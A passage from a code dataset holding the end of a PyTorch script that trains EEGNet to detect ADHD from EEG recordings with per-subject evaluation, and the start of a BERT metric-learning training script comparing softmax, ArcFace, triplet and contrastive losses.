pos=info, vmin=-1, vmax=1, axes=axs1, names=channelnames,\n show_names=True, outlines='head', cmap='viridis', show=False)\n fig.colorbar(im, ax=axs1)\n plt.show()\n\ndef plot_roc(fpr, tpr):\n plt.plot(fpr, tpr, label = 'ROC curve', linewidth = 2)\n plt.plot([0,1],[0,1], 'k--', linewidth = 2)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve ')\n plt.show()\ndef plot_cm(cm):\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.colorbar()\n plt.tight_layout()\n plt.xlabel('Predicted label')\n plt.ylabel('True label')\n\ndef specificity(y_true, y_pred):\n tn = sum((y_true == 0) & (y_pred == 0))\n fp = sum((y_true == 0) & (y_pred == 1))\n return tn / (tn + fp)\ndef sensitivity(y_true, y_pred):\n tp = sum((y_true == 1) & (y_pred == 1))\n fn = sum((y_true == 1) & (y_pred == 0))\n return tp / (tp + fn)\n\n\ndef run():\n\n\n channelnum = 19\n subjnum =120\n samplelength = 4\n sf = 128\n\n # define the learning rate, batch size and epoches\n lr = 1e-3\n batch_size = 32\n n_epoch = 2\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n 
print(subIdx)\n subIdx = subIdx.astype(int)  # astype returns a copy; assign it back\n\n\n samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"label shape\", label.shape)\n print(np.unique(subIdx))\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n # the result stores accuracies of every subject\n results = []\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,\n random_state=42)\n\n # select the subject index here\n for i in range(1, subjnum + 1):\n # form the training data\n trainindx = np.where(subIdx != i)[0]\n xtrain = x_data[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data\n testindx = np.where(subIdx == i)[0]\n xtest = x_data[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n\n # select the deep learning model to be used\n #my_net = InterpretableCNN().double()\n my_net = EEGNet().double()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n # Define ReduceLROnPlateau scheduler\n scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=10, verbose=True)\n\n # Early stopping parameters (kept for reference; superseded by the EarlyStopping helper below)\n early_stopping = {\n 'patience': 20, # Number of epochs with no improvement after which training will be stopped\n 'min_delta': 0.001, # Minimum change in validation loss to be considered as an improvement\n 'best_loss': float('inf'), # Initialize with a large value\n 'counter': 0 # Counter for the number of epochs with no improvement\n }\n\n # Tensorboard writer for logging\n\n\n train_accuracies = []\n val_accuracies = []\n\n # to track the training loss as the model trains\n train_losses = []\n # to track the validation loss as the model trains\n valid_losses = []\n # to track the average training loss per epoch as the model trains\n avg_train_losses = []\n # to track the average validation loss per epoch as the model trains\n avg_valid_losses = []\n\n patience = 20\n # initialize the early_stopping object\n early_stopping = EarlyStopping(patience=patience, verbose=True)\n\n # train the classifier\n for epoch in range(1,n_epoch+1):\n train_loss = 0.0  # accumulate over the whole epoch, not per batch\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label = labels\n #class_label = labels.view(-1, 1 ).double() for BCELoss\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n train_loss += err.item()\n # record training loss\n train_losses.append(err.item())\n\n # Calculate average training loss for the epoch\n avg_train_loss = train_loss / len(train_loader)\n print(\"train loss avg\",avg_train_loss)\n\n my_net.eval()\n val_loss =0.0\n with torch.no_grad():\n\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n print(\"y_test\",y_test)\n y_test = torch.from_numpy(y_test)\n #y_test=y_test.view(-1,1).double() for BCELoss\n print(type(y_test))\n loss = loss_class(answer, y_test)\n val_loss += loss.item()\n valid_losses.append(loss.item())\n probs = np.exp(answer.cpu().numpy())\n 
print(\"probs\",probs)\n\n preds = probs.argmax(axis=-1)\n print(\"preds\",preds)\n acc = accuracy_score(y_test, preds)\n precision = precision_score(y_test, preds)\n recall = recall_score(y_test, preds)\n f1 = f1_score(y_test, preds)\n\n print(acc)\n print(precision)\n print(recall)\n print(f1)\n print(\"val loss\",val_loss)\n print(valid_losses)\n print(specificity(y_test, preds))\n print(sensitivity(y_test, preds))\n results.append(acc)\n fpr, tpr, t = roc_curve(y_test, preds)\n cm = confusion_matrix(y_test, preds,labels=[0,1])\n print(\"conv matrix\",cm)\n #plot_roc(fpr, tpr)\n plot_cm(cm)\n\n # print training/validation statistics\n # calculate average loss over an epoch\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n\n epoch_len = len(str(n_epoch))\n\n print_msg = (f'[{epoch:>{epoch_len}}/{n_epoch:>{epoch_len}}] ' +f'train_loss: {train_loss:.5f} ' +f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n\n # load the last checkpoint with the best model\n #my_net.load_state_dict(torch.load('checkpoint.pt'))\n\n # early_stopping needs the validation loss to check if it has decresed,\n # and if it has, it will make a checkpoint of the current model\n early_stopping(valid_loss, my_net)\n\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n\n\n print('mean accuracy:', np.mean(results))\n\n\n\n # Save the trained model to a file\n torch.save(my_net.state_dict(), 'trained_cnn_model.pth')\n sampleVis = VisTech(my_net)\n\n # select the interpretation method to be used\n method=\"guidedbackpropogation\"\n # method=\"Saliencymap\"\n ########################################\n\n sampleidx = 8\n sampleVis.generate_interpretation(batchInput=x_test, sampleidx=sampleidx, subid=i,\n samplelabel=y_test[sampleidx], likelihood=probs[sampleidx], method=method)\n\n\ntorch.cuda.empty_cache()\n\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "ahmedguebsi/XAI_ADHD_Detection", "sub_path": "adhd_deep/xai_all.py", "file_name": "xai_all.py", "file_ext": "py", "file_size_in_byte": 27274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.empty_cache", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 46, 
"usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.div", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 261, "usage_type": "call"}, 
{"api_name": "torch.zeros_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 409, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "mne.create_info", "line_number": 457, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_coordinates", "line_number": 466, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_positions", "line_number": 468, "usage_type": "call"}, {"api_name": "electrodes_positions.set_electrodes_montage", "line_number": 469, "usage_type": "call"}, {"api_name": "mne.viz.plot_topomap", "line_number": 471, "usage_type": "call"}, {"api_name": "mne.viz", "line_number": 471, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 484, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "adhd_classification.data_load", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.longlong", "line_number": 530, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 544, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 550, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 555, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 556, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 565, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 566, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.ReduceLROnPlateau", "line_number": 568, "usage_type": "call"}, {"api_name": "early_stopping.EarlyStopping", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 629, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 638, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 643, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 644, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 645, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 646, "usage_type": "call"}, {"api_name": 
"sklearn.metrics.roc_curve", "line_number": 657, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 658, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 666, "usage_type": "call"}, {"api_name": "early_stopping.early_stop", "line_number": 686, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 709, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 709, "usage_type": "attribute"}]}
+{"seq_id": "22511070015", "text": "import logging\nimport math\nimport os\nimport random\nimport shutil\n\nimport datasets\nfrom datasets import load_dataset\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\n\nimport transformers\nfrom accelerate import Accelerator\nfrom transformers import (\n AdamW,\n AutoTokenizer,\n DataCollatorWithPadding,\n default_data_collator,\n get_scheduler,\n set_seed,\n)\n\nimport modules.args as args\nfrom modules.models import (\n BertCls,\n BertClsSoftmaxCrossEntropyLoss,\n BertClsArcFaceLoss,\n TripletMarginLoss,\n MultiSimilarityLoss,\n NTXentLoss,\n)\nfrom modules.utils import AccuracyCalculator\nfrom modules.samplers import (\n MPerClassSampler, \n MPerClassSamplerWithoutEasyPostives\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef choose_loss(args, num_labels):\n if args.loss_type == \"softmax\":\n model = BertClsSoftmaxCrossEntropyLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n )\n return model, None\n elif args.loss_type == \"arcface\":\n model = BertClsArcFaceLoss(\n model_name_or_path=args.model_name_or_path,\n num_labels=num_labels,\n margin=args.margin,\n scale=args.scale\n )\n return model, None\n elif args.loss_type == \"triplet\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = TripletMarginLoss(\n margin=args.margin,\n triplets_per_anchor=\"all\"\n )\n return bert_model, loss_model\n elif args.loss_type == \"ms\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = MultiSimilarityLoss(\n alpha=args.alpha,\n beta=args.beta,\n base=args.base\n )\n return bert_model, loss_model\n elif args.loss_type == \"ntxent\":\n bert_model = BertCls(\n model_name_or_path=args.model_name_or_path\n )\n loss_model = NTXentLoss(\n temperature=args.temperature\n )\n return bert_model, loss_model\n else:\n logging.error(\"choose one loss model\")\n exit(1)\n\n\ndef main(args):\n # Initialize the accelerator. 
We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator()\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(logging.INFO if accelerator.is_local_main_process else logging.ERROR)\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.output_dir is not None:\n os.makedirs(args.output_dir, exist_ok=True)\n accelerator.wait_for_everyone()\n\n # Loading the dataset from local csv or json file.\n data_files = {}\n if args.train_file is not None:\n data_files[\"train\"] = args.train_file\n if args.validation_file is not None:\n data_files[\"validation\"] = args.validation_file\n\n raw_datasets = load_dataset('json', data_files=data_files)\n\n # A useful fast method:\n # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique\n if args.label_num is not None:\n label_list = [f\"{i:02}\" for i in range(1, args.label_num+1)]\n else:\n label_list = raw_datasets[\"train\"].unique(\"label\") + raw_datasets[\"validation\"].unique(\"label\")\n label_list = list(set(label_list))\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n ngram_list = raw_datasets[\"train\"].unique(\"ngram\") + raw_datasets[\"validation\"].unique(\"ngram\")\n\n # Load pretrained model and tokenizer\n #\n # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)\n\n sentence_key = \"text\"\n\n label_to_id = {v: i for i, v in enumerate(label_list)}\n ngram_to_id = {v: i for i, v in enumerate(ngram_list)}\n\n padding = \"max_length\" if args.pad_to_max_length else False\n\n def preprocess_function(examples):\n # Tokenize the texts\n texts = (\n (examples[sentence_key],)\n )\n result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)\n\n if \"label\" in examples:\n if label_to_id is not None:\n # Map labels to IDs (not necessary for GLUE tasks)\n result[\"labels\"] = [label_to_id[l] for l in examples[\"label\"]]\n else:\n # In all cases, rename the column to labels because the model will expect that.\n result[\"labels\"] = examples[\"label\"]\n\n result[\"ngram_ids\"] = [ngram_to_id[l] for l in examples[\"ngram\"]]\n return result\n\n with accelerator.main_process_first():\n processed_datasets = raw_datasets.map(\n preprocess_function,\n batched=True,\n remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on dataset\",\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(train_dataset)), 3):\n 
logger.info(f\"Sample {index} of the training set: {train_dataset[index]}.\")\n\n # DataLoaders creation:\n if args.pad_to_max_length:\n # If padding was already done ot max length, we use the default data collator that will just convert everything\n # to tensors.\n data_collator = default_data_collator\n else:\n # Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of\n # the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple\n # of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))\n\n # Classification loss or embedding loss\n if args.loss_type in [\"softmax\", \"arcface\"]:\n model, _ = choose_loss(args, num_labels)\n else:\n model, loss_model = choose_loss(args, num_labels)\n\n\n train_sampler = None\n eval_sampler = None\n if args.m_per_class_sampler:\n train_sampler = MPerClassSampler(\n train_dataset[\"labels\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSampler(\n eval_dataset[\"labels\"], \n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n if args.m_per_class_sampler_without_easy_positives:\n train_sampler = MPerClassSamplerWithoutEasyPostives(\n train_dataset[\"labels\"],\n train_dataset[\"ngram_ids\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSamplerWithoutEasyPostives(\n eval_dataset[\"labels\"],\n eval_dataset[\"ngram_ids\"],\n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n train_dataloader = DataLoader(\n train_dataset, \n shuffle=(train_sampler is None),\n sampler=train_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_train_batch_size,\n drop_last=True\n )\n eval_dataloader = DataLoader(\n eval_dataset, \n shuffle=(eval_sampler is None),\n sampler=eval_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_eval_batch_size,\n drop_last=True\n )\n\n # Optimizer\n # Split weights in two groups, one with weight decay and the other not.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n # Prepare everything with our `accelerator`.\n model, optimizer, train_dataloader, eval_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader, eval_dataloader\n )\n\n # Note -> the training dataloader needs to be prepared before we grab his length below (cause its length will be\n # shorter in multiprocess)\n\n # Scheduler and math around the number of training steps.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)\n\n args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n lr_scheduler = 
get_scheduler(\n name=args.lr_scheduler_type,\n optimizer=optimizer,\n num_warmup_steps=args.num_warmup_steps,\n num_training_steps=args.max_train_steps,\n )\n\n accuracy_calculator = AccuracyCalculator(k=\"max_bin_count\", include=(\"precision_at_1\", \"r_precision\", \"mean_average_precision_at_r\"))\n\n # Train!\n total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Num Epochs = {args.num_train_epochs}\")\n logger.info(f\" Instantaneous batch size per device = {args.per_device_train_batch_size}\")\n logger.info(f\" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {args.max_train_steps}\")\n\n\n model.eval()\n\n embeddings = []\n labels = []\n\n for step, batch in enumerate(tqdm(eval_dataloader)):\n if step < 5:\n logger.info(f\"[labels in eval batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in eval batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n results_txt = \"\"\n current_record = 0\n current_record_epoch_or_step = -1\n logger.info(f\"epoch -1 (before training): {eval_metric}\")\n results_txt += f\"epoch -1 (before training): {eval_metric}\\n\"\n\n\n progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)\n completed_steps = 0\n\n for epoch in range(args.num_train_epochs):\n model.train()\n\n for step, batch in enumerate(train_dataloader):\n if epoch == 0 and step < 5:\n logger.info(f\"[labels in train batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in train batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n\n if args.loss_type in [\"softmax\", \"arcface\"]:\n outputs = model(**batch)\n loss = outputs.loss\n\n else:\n outputs = model(**batch)\n embeddings_in_batch = outputs.embeddings\n labels_in_batch = batch[\"labels\"]\n\n loss = loss_model(embeddings_in_batch, labels_in_batch)\n\n loss = loss / args.gradient_accumulation_steps\n accelerator.backward(loss)\n\n if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n 